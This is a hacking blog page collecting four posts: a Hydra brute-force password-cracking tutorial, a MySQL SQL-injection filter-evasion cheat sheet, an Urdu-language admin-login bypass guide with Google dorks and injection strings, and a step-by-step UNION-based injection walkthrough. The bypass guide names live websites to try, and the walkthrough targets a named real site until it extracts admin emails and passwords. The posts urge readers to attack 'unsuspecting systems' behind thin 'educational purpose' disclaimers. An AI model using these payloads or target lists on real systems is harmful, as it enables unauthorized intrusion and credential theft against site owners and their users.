hacking
Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts
Brute Force Password Cracking and HACKING

Brute Force Password Cracking and HACKING

04:43 Add Comment




hackingtutorial



One of the most important skills used in hacking and penetration testing is the ability to crack user passwords and gain access to system and network resources. One of the most common techniques is known as brute force password cracking. Using tools such as Hydra, you can run large lists of possible passwords against various network security protocols until the correct password is discovered.
The length of time a brute force password attack takes depends on the processing speed of your computer, your Internet connection speed (and any proxy servers you are relying on for anonymity), and some of the security features that may or may not be installed on the target system. The Whitehat Hacking and Penetration Testing tutorial provides a solid overview of password cracking techniques.
Although there are quite a few password cracking utilities available, Hydra is renowned as one of the best ones and is relied on by hackers and security experts alike as a way to test the strength of user passwords and overall network integrity.
What Protocols Does Hydra Work With?

Hydra is a very versatile penetration testing tool that has been successfully used with most modern network security protocols. Some examples include:
Cisco
Cisco-enable
HTTPS-form-get
MySQL
SSH2
SIP
FTP
Oracle-listener
MSSQL
IMAP
This is a condensed list of some common protocols that Hydra has been successfully used against in penetration testing and malicious hacking exploits but there are many others as well.
How Does Hydra Work?

In order to understand how Hydra works, you first must understand how brute force hacking works. As previously mentioned, Hydra takes a large list of possible passwords (usually in the millions) and systematically attempts to use these passwords to gain entry. Many of the common passwords that are included with Hydra are passwords that are known to be used by non-IT savvy users such as password1, secretpassword, etc.
To maximize the effectiveness of a brute force password attack, a good hacker will also incorporate elements of social engineering into a custom password list that specifically targets users within an organization. Social media sites such as Facebook have made social engineering extremely easy as many people use loved ones, children’s names, street addresses, and favorite football teams as their passwords. By linking employees to a specific organization and then looking for social media clues, a hacker can usually build a sturdy password list with a much higher success ratio. You can learn more about social engineering techniques in Hacking School.
Hydra was actually developed for penetration testing, although it has become very popular in the hacking underworld. Regardless of which way you plan to use Hydra, it’s worth noting the recommendations set forth by the Hydra developers.
Make your network as secure as possible.
Set up a test network.
Set up a test server.
Configure services.
Configure the ACL.
Choose good passwords.
Use SSL.
Use cryptography.
Use an IDS.
Throw Hydra against these security measures and try to crack the login commands.
These recommendations are designed to help penetration testers set up a secure environment that it is unlikely to be breached by a Hydra attack. The reality is that many networks are set up by amateurs and there is little to no security.
In most professionally configured networks, there are a few security components that render Hydra practically useless and you will probably fail at your attempts to crack passwords and could possibly be charged with a crime for your actions.
Some of these security measures include:
Disabling or blocking access to accounts after a predetermined number of failed authentication attempts has been reached. If this has been configured on a  network, chances are it will only allow 3 – 5 attempts before locking down the account. The likelihood that Hydra will guess the correct password in this many attempts is slim to none. In fact, you’d be more likely to win the Powerball.
Many companies have also gone to a multifactor or double opt-in authentication method for users. This means that in addition to a password, a security question has to be answered correctly for access. At this time, Hydra is not set up to crack multifactor authentication.
Installing Hydra

Hydra is a Linux-based tool that can be downloaded freely from the proper repository. Open a Linux terminal and enter the following instructions to download and install the latest version of Hydra:
cd /data/src/
wget http://freeworld.thc.org/releases/hydra-5.9-src.tar.gz
tar xzvf hydra-5.9-src.tar.gz
cd hydra-5.9-src/
./configure
Make
sudo make install
Now that Hydra is properly installed on your machine, you’re ready to launch attacks on unsuspecting systems. Although in theory this password cracking utility can work on any network that is not properly secured, some of your best targets are going to be routers that support SSH and Web servers using FTP. Advanced Penetration Testing breaks down likely targets and specific attacks that are effective for each.
If you can gain access to a router via SSH, you can change administrative settings at the root level and then log into the network wirelessly for complete access to network resources. Cracking the FTP password on Web server provides similar results and can dig up some interesting information or be used to deface websites hosted on the Web server by modifying existing HTML and image files contained within the website hierarchy. Introduction to Ethical Hacking and Web Application Security details common security practices and ways to bypass them using Hydra and other tools.
Using Hydra as a password cracker is not an invincible solution. Rather, you should think of Hydra has just another tool in your hacker’s toolbox that can be used when appropriate to gain access to improperly secured network resources.
As a final note, it is illegal to access a network that does not belong to you without permission from the network administrators. If you are using Hydra as a professional penetration tester, you have nothing to worry about. If you are trying to gain unauthorized access to networks in your spare time, you could very well have the police knocking at your door in no time.
Remember – with great power comes great responsibility.
SQLi filter evasion cheat sheet (MySQL)

SQLi filter evasion cheat sheet (MySQL)

04:31 Add Comment
SQLi filter evasion cheat sheet (MySQL)

This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 years of PHPIDS filter evasion at the CONFidence 2.0 conference. You can find the slides here. For a quicker reference you can use the following cheatsheet. More detailed explaination can be found in the slides or in the talk (video should come online in a few weeks).

Basic filter
Comments
‘ or 1=1#
‘ or 1=1– –
‘ or 1=1/* (MySQL < 5.1)
' or 1=1;
' or 1=1 union select 1,2 as `
' or#newline
1='1
' or– -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1
Prefixes
+ – ~ !
‘ or –+2=- -!!!’2
Operators
^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL
Whitespaces
%20 %09 %0a %0b %0c %0d %a0 /**/
‘or+(1)sounds/**/like“1“–%a0-
‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)#
Strings with quotes
SELECT ‘a’
SELECT “a”
SELECT n’a’
SELECT b’1100001′
SELECT _binary’1100001′
SELECT x’61’
Strings without quotes
‘abc’ = 0x616263
Aliases
select pass as alias from users
select pass aliasalias from users
select pass`alias alias`from users
Typecasting
‘ or true = ‘1 # or 1=1
‘ or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1
‘ or ‘1 # or true
Compare operator typecasting
select * from users where ‘a’=’b’=’c’
select * from users where (‘a’=’b’)=’c’
select * from users where (false)=’c’
select * from users where (0)=’c’
select * from users where (0)=0
select * from users where true
select * from users
Authentication bypass ‘=’
select * from users where name = ”=”
select * from users where false = ”
select * from users where 0 = 0
select * from users where true
select * from users
Authentication bypass ‘-‘
select * from users where name = ”-”
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users
Function filter
General function filtering
ascii (97)
load_file/*foo*/(0x616263)
Strings with functions
‘abc’ = unhex(616263)
‘abc’ = char(97,98,99)
hex(‘a’) = 61
ascii(‘a’) = 97
ord(‘a’) = 97
‘ABC’ = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))
Strings extracted from gadgets
collation(\N) // binary
collation(user()) // utf8_general_ci
@@time_format // %H:%i:%s
@@binlog_format // MIXED
@@version_comment // MySQL Community Server (GPL)
dayname(from_days(401)) // Monday
dayname(from_days(403)) // Wednesday
monthname(from_days(690)) // November
monthname(from_unixtime(1)) // January
collation(convert((1)using/**/koi8r)) // koi8r_general_ci
(select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs
Special characters extracted from gadgets
aes_encrypt(1,12) // 4çh±{?”^c×HéÉEa
des_encrypt(1,2) // ‚GÒ/ïÖk
@@ft_boolean_syntax // + -><()~*:""&|
@@date_format // %Y-%m-%d
@@innodb_log_group_home_dir // .\
Integer representations
false: 0
true: 1
true+true: 2
floor(pi()): 3
ceil(pi()): 4
floor(version()): 5
ceil(version()): 6
ceil(pi()+pi()): 7
floor(version()+pi()): 8
floor(pi()*pi()): 9
ceil(pi()*pi()): 10
concat(true,true): 11
ceil(pi()*pi())+true: 11
ceil(pi()+pi()+version()): 12
floor(pi()*pi()+pi()): 13
ceil(pi()*pi()+pi()): 14
ceil(pi()*pi()+version()): 15
floor(pi()*version()): 16
ceil(pi()*version()): 17
ceil(pi()*version())+true: 18
floor((pi()+pi())*pi()): 19
ceil((pi()+pi())*pi()): 20
ceil(ceil(pi())*version()): 21
concat(true+true,true): 21
ceil(pi()*ceil(pi()+pi())): 22
ceil((pi()+ceil(pi()))*pi()): 23
ceil(pi())*ceil(version()): 24
floor(pi()*(version()+pi())): 25
floor(version()*version()): 26
ceil(version()*version()): 27
ceil(pi()*pi()*pi()-pi()): 28
floor(pi()*pi()*floor(pi())): 29
ceil(pi()*pi()*floor(pi())): 30
concat(floor(pi()),false): 30
floor(pi()*pi()*pi()): 31
ceil(pi()*pi()*pi()): 32
ceil(pi()*pi()*pi())+true: 33
ceil(pow(pi(),pi())-pi()): 34
ceil(pi()*pi()*pi()+pi()): 35
floor(pow(pi(),pi())): 36
@@new: 0
@@log_bin: 1
!pi(): 0
!!pi(): 1
true-~true: 3
log(-cos(pi())): 0
-cos(pi()): 1
coercibility(user()): 3
coercibility(now()): 4
minute(now())
hour(now())
day(now())
week(now())
month(now())
year(now())
quarter(now())
year(@@timestamp)
crc32(true)
Extract substrings
substr(‘abc’,1,1) = ‘a’
substr(‘abc’ from 1 for 1) = ‘a’
substring(‘abc’,1,1) = ‘a’
substring(‘abc’ from 1 for 1) = ‘a’
mid(‘abc’,1,1) = ‘a’
mid(‘abc’ from 1 for 1) = ‘a’
lpad(‘abc’,1,space(1)) = ‘a’
rpad(‘abc’,1,space(1)) = ‘a’
left(‘abc’,1) = ‘a’
reverse(right(reverse(‘abc’),1)) = ‘a’
insert(insert(‘abc’,1,0,space(0)),2,222,space(0)) = ‘a’
space(0) = trim(version()from(version()))
Search substrings
locate(‘a’,’abc’)
position(‘a’,’abc’)
position(‘a’ IN ‘abc’)
instr(‘abc’,’a’)
substring_index(‘ab’,’b’,1)
Cut substrings
length(trim(leading ‘a’ FROM ‘abc’))
length(replace(‘abc’, ‘a’, ”))
Compare strings
strcmp(‘a’,’a’)
mod(‘a’,’a’)
find_in_set(‘a’,’a’)
field(‘a’,’a’)
count(concat(‘a’,’a’))
String length
length()
bit_length()
char_length()
octet_length()
bit_count()
String case
ucase
lcase
lower
upper
password(‘a’) != password(‘A’)
old_password(‘a’) != old_password(‘A’)
md5(‘a’) != md5(‘A’)
sha(‘a’) != sha(‘A’)
aes_encrypt(‘a’) != aes_encrypt(‘A’)
des_encrypt(‘a’) != des_encrypt(‘A’)
Keyword filter
Connected keyword filtering
(0)union(select(table_name),column_name,…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0’union all select all`table_name`foo from`information_schema`. `tables`
OR, AND
‘||1=’1
‘&&1=’1
‘=’
‘-‘
OR, AND, UNION
‘ and (select pass from users limit 1)=’secret
OR, AND, UNION, LIMIT
‘ and (select pass from users where id =1)=’a
OR, AND, UNION, LIMIT, WHERE
‘ and (select pass from users group by id having id = 1)=’a
OR, AND, UNION, LIMIT, WHERE, GROUP
‘ and length((select pass from users having substr(pass,1,1)=’a’))
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
‘ and (select substr(group_concat(pass),1,1) from users)=’a
‘ and substr((select max(pass) from users),1,1)=’a
‘ and substr((select max(replace(pass,’lastpw’,”)) from users),1,1)=’a
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
‘ and substr(load_file(‘file’),locate(‘DocumentRoot’,(load_file(‘file’)))+length(‘DocumentRoot’),10)=’a
‘=” into outfile ‘/var/www/dump.txt
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
‘ procedure analyse()#
‘-if(name=’Admin’,1,0)#
‘-if(if(name=’Admin’,1,0),if(substr(pass,1,1)=’a’,1,0),0)#
Control flow
case ‘a’ when ‘a’ then 1 [else 0] end
case when ‘a’=’a’ then 1 [else 0] end
if(‘a’=’a’,1,0)
ifnull(nullif(‘a’,’a’),1)
Simple sql bypass website hacking

Simple sql bypass website hacking

04:29 Add Comment
SQL Injection Admin Bypass In Urdu
 

ASPX Kay Liye Zida ye string use hoti ha

password: 1'or'1'='1

Or php kay liye

password:  1' OR '1'='1

TO Find website use below dorks

inurl:adminlogin.asp

inurl:admin_login.asp

inurl:adminlogon.asp

inurl:admin_logon.asp

inurl:\\admin/admin_login.php

inurl:/admin.asp

inurl:/login.asp

inurl:/logon.asp

inurl:/adminlogin.asp

inurl:/adminlogon.asp

inurl:/admin_login.asp

inurl:/admin_logon.asp

inurl:/admin/admin.asp

inurl:/admin/login.asp

inurl:/admin/logon.asp

inurl:/admin/adminlogin.asp

inurl:/admin/adminlogon.asp

inurl:/admin/admin_login.asp

inurl:/admin/admin_logon.asp

inurl:/administrator/admin.asp

inurl:/administrator/login.asp

inurl:/administrator/logon.asp

inurl:root/login.asp

inurl:admin/index.asp


Password: admin'--

1'or'1'='1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #


' or 'x'='x

" or "x"="x



') or ('x'='x



' or 1=1--



" or 1=1--



or 1=1--



' or a=a--



" or "a"="a



') or ('a'='a



") or ("a"="a



hi" or "a"="a



hi" or 1=1 --



hi' or 1=1 --



hi' or 'a'='a



hi') or ('a'='a



hi") or ("a"="a


1' OR '1'='1 (Koi Ek Dalna Ha Password Mein)



Phr Click Kryn Enter. u r in admin panel Try here
http://shopping.richardhealey.com/



http://www.amskrupajal.org/AdminLogin.asp


admin = 1'or'1'='1 pass = 1'or'1'='1



http://www.alertfx.com/admin/admin.asp

admin = 1'or'1'='1 pass = 1'or'1'='1

Thanks for visit

This is only for the educational purpose

How to hack website manual ( Full Guide )

04:24 Add Comment

Hello  once again T00L kiT here, today i gonna start Sqli Injection, today is First class so lets start

Requirements :-

Firefox Browser

Hackbar Addon

Vulnerability Site  

 i have already Vulnerability site like this

http://www.morephotosradio.com/transcript.php?interview_id=2021

Check this this website vulnerability yes or no, Put ' in the end of Url Like
  Step 1
=> http://www.morephotosradio.com/transcript.php?interview_id=2021'

yes i got a sql error you can see this

Step 2
=> Find tables numbers using order by--+- query For example

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 1--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 2--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 3--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 4--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 5--+-  (No Error)



and so on when we got Error this mean its table number like

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45--+-  (No Error)


http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47--+-  ( Error)

its mean its have 46 table numbers

Step 3
=> Go to union based => Union statement and Select INT,INT


Step 4
=> Now enter table number value and click ok 


Step 5
=> after click ok you see this suto type 1 to 46 numbers then click Execute for checking its working 


Its working we can't got any error :D 

step 6
=> Put in the end link values like this
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+-


you can see this when we put - we go got Columns number is 6

Step 7
=> Now we need version :-
replace 6 number this query "version()"



you can see this we got sqli Version if you want more information like user name hostname and database use this query :-

For Version = version()
For Database = database()
For use = use()
For Host = host@@

Step 8
=> now we need table information so replace 6 number follow query "group_concat(table_name)" without quotes and in the end or url use this query "from information_Schema.tables wehre table schema=database()--+-" without quotes like

For Tables

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(tables_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.tables where table_schema=database()--+-


you can see this we got all table names , we need admin user name because we wanna hack website :D

Step 9
=> now replace "database()" with User


Now select user and go to "sqli basics" and select "char()" then past "user" then click ok like 



And replace table with columns like this
For columns 
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.columns where table_name=CHAR(117, 115, 101, 114)--+-
 now click Execute  


Step 10
Now we need admin Email id and password now use this query 

replace column_name with which data we need and ,0x3a, mean when we need more data or in the end of url type table name

For data

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from User--+-


You can see this we got all admin emails and passwords ;) :D 

i hope you like this Tutorial 

Thanks for visiting

This is only for the educational purpose
Subscribe to: Posts (Atom)